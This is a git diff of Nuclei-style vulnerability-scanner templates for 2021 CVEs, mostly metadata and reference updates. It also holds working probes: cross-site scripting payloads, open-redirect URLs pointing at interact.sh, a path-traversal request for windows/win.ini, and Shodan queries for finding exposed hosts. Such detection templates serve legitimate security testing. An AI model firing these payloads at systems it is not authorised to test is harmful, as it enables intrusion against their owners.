diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index bceb482946..5f9932809c 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -20,7 +20,7 @@ info:
 requests:
   - raw:
       - |+
-        GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+        GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
         Host: {{Hostname}}
         Connection: close
 
@@ -34,6 +34,6 @@ requests:
 
       - type: word
         words:
-          - "com\"/onmouseover=\"alert(1)\">"
+          - "sh\"/onmouseover=\"alert(1)\">"
 
 # Enhanced by mp on 2022/04/21
diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml
index c95a257ce3..c9041b5d63 100644
--- a/cves/2021/CVE-2021-3378.yaml
+++ b/cves/2021/CVE-2021-3378.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-3378
 
 info:
-  name: FortiLogger Unauthenticated Arbitrary File Upload
+  name: FortiLogger 4.4.2.2 - Arbitrary File Upload
   author: dwisiswant0
   severity: critical
   description: |
-    This template detects an unauthenticated arbitrary file upload
-    via insecure POST request. It has been tested on version 4.4.2.2 in
-    Windows 10 Enterprise.
+    FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
   reference:
     - https://erberkan.github.io/2021/cve-2021-3378/
+    - https://github.com/erberkan/fortilogger_arbitrary_fileupload
+    - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html
+    - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-3378
     cwe-id: CWE-434
-  tags: cve,cve2021,fortilogger,fortigate,fortinet
+  tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
 
 requests:
   - raw:
@@ -55,4 +56,6 @@ requests:
           - "text/plain"
           - "ASP.NET"
         condition: and
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml
index 98ce635602..81205640f3 100644
--- a/cves/2021/CVE-2021-33807.yaml
+++ b/cves/2021/CVE-2021-33807.yaml
@@ -9,6 +9,7 @@ info:
     - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
     - https://www.gespage.com/cartadis-db/
+    - https://www.cartadis.com/gespage-website/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml
index 352b3f1b8c..1f6531393d 100644
--- a/cves/2021/CVE-2021-33904.yaml
+++ b/cves/2021/CVE-2021-33904.yaml
@@ -1,18 +1,21 @@
 id: CVE-2021-33904
 
 info:
-  name: Accela Civic Platform 21.1 - 'servProvCode' XSS
+  name: Accela Civic Platform <=21.1 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
+  description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.
   reference:
     - https://www.exploit-db.com/exploits/49980
+    - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21
+    - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33904
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-33904
     cwe-id: CWE-79
-  tags: cve,cve2021,accela,xss
+  tags: cve2021,accela,xss,edb,packetstorm,cve
 
 requests:
   - method: GET
@@ -34,4 +37,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml
index 36b7cf96b0..ce3d29a587 100644
--- a/cves/2021/CVE-2021-34370.yaml
+++ b/cves/2021/CVE-2021-34370.yaml
@@ -1,28 +1,31 @@
 id: CVE-2021-34370
 
 info:
-  name: Accela Civic Platform 21.1 - Open Redirect & XSS
+  name: Accela Civic Platform <=21.1 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
+  description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via  ssoAdapter/logoutAction.do successURL.
   reference:
     - https://www.exploit-db.com/exploits/49990
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-34370
     - https://www.accela.com/civic-platform/
+    - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-34370
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-34370
     cwe-id: CWE-79
-  tags: xss,redirect,cve,cve2021,accela
+  tags: xss,redirect,cve,cve2021,accela,edb
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
+      - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml
index 4879c5bd5e..50935fbd47 100644
--- a/cves/2021/CVE-2021-34429.yaml
+++ b/cves/2021/CVE-2021-34429.yaml
@@ -8,6 +8,8 @@ info:
     For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
   reference:
     - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+    - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E
+    - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
index 7bca526624..0790f9001c 100644
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
@@ -11,12 +11,12 @@ info:
     - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
     - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
     - https://nvd.nist.gov/vuln/detail/CVE-2021-34473
+  remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-34473
-  remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.
-  tags: cve,cve2021,ssrf,rce,exchange
+  tags: cve,cve2021,ssrf,rce,exchange,kev
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml
index 87eef74ba3..60594dba07 100644
--- a/cves/2021/CVE-2021-34621.yaml
+++ b/cves/2021/CVE-2021-34621.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
     - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
+    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
+    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-34621
     cwe-id: CWE-269
-  tags: cve,cve2021,wordpress,wp-plugin
+  tags: wordpress,wp-plugin,packetstorm,cve,cve2021
 
 requests:
   - raw:
@@ -32,11 +34,11 @@ requests:
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_email"
 
-        {{randstr}}@example.com
+        {{randstr}}@interact.sh
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_password"
 
-        {{randstr}}@example.com
+        {{randstr}}@interact.sh
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_password_present"
 
@@ -44,11 +46,11 @@ requests:
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_first_name"
 
-        {{randstr}}@example.com
+        {{randstr}}@interact.sh
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="reg_last_name"
 
-        {{randstr}}@example.com
+        {{randstr}}@interact.sh
         -----------------------------138742543134772812001999326589
         Content-Disposition: form-data; name="_wp_http_referer"
 
@@ -87,7 +89,7 @@ requests:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}
 
-        log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
+        log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
 
       - |
         GET /wp-admin/ HTTP/1.1
diff --git a/cves/2021/CVE-2021-34640.yaml b/cves/2021/CVE-2021-34640.yaml
index 799cd92386..671821477a 100644
--- a/cves/2021/CVE-2021-34640.yaml
+++ b/cves/2021/CVE-2021-34640.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-34640
 
 info:
-  name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary
-    web scripts, in versions up to and including 3.5.4.
+  description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.
   reference:
     - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640
+    - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628
     - https://nvd.nist.gov/vuln/detail/CVE-2021-34640
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-34640
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+  tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated
 
 requests:
   - raw:
@@ -47,3 +48,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-34643.yaml b/cves/2021/CVE-2021-34643.yaml
index 2b499121d7..6210fa2c8d 100644
--- a/cves/2021/CVE-2021-34643.yaml
+++ b/cves/2021/CVE-2021-34643.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-34643
 
 info:
-  name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
+  name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web
-    scripts, in versions up to and including 1.3.2.
+  description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.
   reference:
     - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643
+    - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-34643
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-34643
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+  tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated
 
 requests:
   - raw:
@@ -47,3 +48,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-34805.yaml b/cves/2021/CVE-2021-34805.yaml
index 1ec6954205..255b5c9aaa 100644
--- a/cves/2021/CVE-2021-34805.yaml
+++ b/cves/2021/CVE-2021-34805.yaml
@@ -4,16 +4,18 @@ info:
   name: FAUST iServer 9.0.018.018.4 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
+  description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
   reference:
     - https://cxsecurity.com/issue/WLB-2022010120
-    - https://www.cvedetails.com/cve/CVE-2021-34805
+    - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html
+    - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-34805
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-34805
     cwe-id: CWE-22
-  tags: cve,cve2021,faust,iserver,lfi
+  tags: lfi,packetstorm,cve,cve2021,faust,iserver
 
 requests:
   - method: GET
@@ -32,4 +34,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml
index aa133c063e..b60202d0af 100644
--- a/cves/2021/CVE-2021-35265.yaml
+++ b/cves/2021/CVE-2021-35265.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-35265
 
 info:
-  name: MaxSite CMS XSS
+  name: MaxSite CMS Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
   reference:
     - https://github.com/maxsite/cms/issues/414#issue-726249183
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35265
+    - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-35380.yaml b/cves/2021/CVE-2021-35380.yaml
new file mode 100644
index 0000000000..499374080d
--- /dev/null
+++ b/cves/2021/CVE-2021-35380.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-35380
+
+info:
+  name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
+  author: fxploit
+  severity: high
+  description: |
+    A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
+  reference:
+    - https://www.swascan.com/solari-di-udine/
+    - https://www.exploit-db.com/exploits/50638
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-35380
+    cwe-id: CWE-22
+  tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml
index 49edf8161e..157369db7b 100644
--- a/cves/2021/CVE-2021-35464.yaml
+++ b/cves/2021/CVE-2021-35464.yaml
@@ -12,12 +12,16 @@ info:
   reference:
     - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464
+    - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html
+    - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-35464
     cwe-id: CWE-502
-  tags: cve,cve2021,openam,rce,java
+  metadata:
+    shodan-query: http.title:"OpenAM"
+  tags: cve,cve2021,openam,rce,java,kev,cisa,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-35488.yaml b/cves/2021/CVE-2021-35488.yaml
new file mode 100644
index 0000000000..7f2146bdea
--- /dev/null
+++ b/cves/2021/CVE-2021-35488.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-35488
+
+info:
+  name: Thruk 2.40-2 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
+  reference:
+    - https://www.gruppotim.it/redteam
+    - https://www.thruk.org/changelog.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35488
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-35488
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Thruk"
+    verified: "true"
+  tags: cve,cve2021,thruk,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'></script><script>alert(document.domain)</script>"
+          - "Thruk Monitoring"
+        condition: and
+
+      - type: status
+        status:
+          - 401
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-35587.yaml b/cves/2021/CVE-2021-35587.yaml
index 6afb1af167..7f4cbd0ed0 100644
--- a/cves/2021/CVE-2021-35587.yaml
+++ b/cves/2021/CVE-2021-35587.yaml
@@ -9,6 +9,7 @@ info:
   reference:
     - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35587
+    - https://www.oracle.com/security-alerts/cpujan2022.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml
index 9e96fb4cfd..847fcdb13b 100644
--- a/cves/2021/CVE-2021-3577.yaml
+++ b/cves/2021/CVE-2021-3577.yaml
@@ -3,16 +3,17 @@ id: CVE-2021-3577
 info:
   name: Motorola Baby Monitors - Remote Command Execution
   author: gy741
-  severity: critical
+  severity: high
   description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
   reference:
     - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577
+    - https://binatoneglobal.com/security-advisory/
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
     cve-id: CVE-2021-3577
-    cwe-id: CWE-78
+    cwe-id: CWE-863
   tags: cve,cve2021,rce,oast,motorola,iot
 
 requests:
diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml
index 7963796c10..3d613c09a1 100644
--- a/cves/2021/CVE-2021-36260.yaml
+++ b/cves/2021/CVE-2021-36260.yaml
@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-77,CWE-20
   metadata:
     shodan-query: http.favicon.hash:999357577
-  tags: cve,cve2021,hikvision,rce,iot,intrusive
+  tags: cve,cve2021,hikvision,rce,iot,intrusive,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-36356.yaml b/cves/2021/CVE-2021-36356.yaml
index 21b8a48e63..282163136b 100644
--- a/cves/2021/CVE-2021-36356.yaml
+++ b/cves/2021/CVE-2021-36356.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-36356
 
 info:
-  name: Kramer VIAware RCE
+  name: Kramer VIAware - Remote Code Execution
   author: gy741
   severity: critical
   description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
@@ -9,12 +9,13 @@ info:
     - https://www.exploit-db.com/exploits/50856
     - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
     - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
-  tags: rce,viaware,cve,cve2021,kramer
+    - https://write-up.github.io/kramerav/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.80
+    cvss-score: 9.8
     cve-id: CVE-2021-36356
     cwe-id: CWE-434
+  tags: viaware,cve,cve2021,kramer,edb,rce
 
 requests:
   - raw:
@@ -34,3 +35,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml
index b77893f66a..b1d6a7938b 100644
--- a/cves/2021/CVE-2021-36380.yaml
+++ b/cves/2021/CVE-2021-36380.yaml
@@ -4,10 +4,11 @@ info:
   name: Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection
   author: gy741
   severity: critical
-  description: "Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session."
+  description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
   reference:
     - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-36380
+    - https://www.sunhillo.com/product/sureline/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml
new file mode 100644
index 0000000000..c95ae38b34
--- /dev/null
+++ b/cves/2021/CVE-2021-36450.yaml
@@ -0,0 +1,65 @@
+id: CVE-2021-36450
+
+info:
+  name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
+  author: atomiczsec
+  severity: medium
+  description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
+  reference:
+    - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
+    - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
+    - http://verint.com
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-36450
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Verint Sign-in"
+    verified: "true"
+  tags: cve,cve2021,xss,verint
+
+requests:
+  - raw:
+      - |
+        GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        part: header
+        internal: true
+        name: csrfp_login
+        group: 1
+        regex:
+          - 'csrfp_login=([a-zA-Z0-9]+);'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><h1>Test</h1>26" class="loginUserNameText'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml
index 4aa4b5ebb6..89990fba3a 100644
--- a/cves/2021/CVE-2021-3654.yaml
+++ b/cves/2021/CVE-2021-3654.yaml
@@ -8,24 +8,26 @@ info:
   reference:
     - https://seclists.org/oss-sec/2021/q3/188
     - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
+    - https://bugs.python.org/issue32084
+    - https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-3654
     cwe-id: CWE-601
-  tags: redirect,novnc,cve,cve2021
+  tags: redirect,novnc,cve,cve2021,seclists
 
 requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}//example.com/%2f..'
+      - '{{BaseURL}}//interact.sh/%2f..'
 
     matchers-condition: and
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
 
       - type: status
diff --git a/cves/2021/CVE-2021-36748.yaml b/cves/2021/CVE-2021-36748.yaml
index c85b934f89..f8776c3c8a 100644
--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -1,13 +1,15 @@
 id: CVE-2021-36748
 
 info:
-  name: PrestaHome Blog for PrestaShop - SQL Injection
+  name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection
   author: whoever
   severity: high
-  description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection (blind) via sb_category parameter.
+  description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-36748
     - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
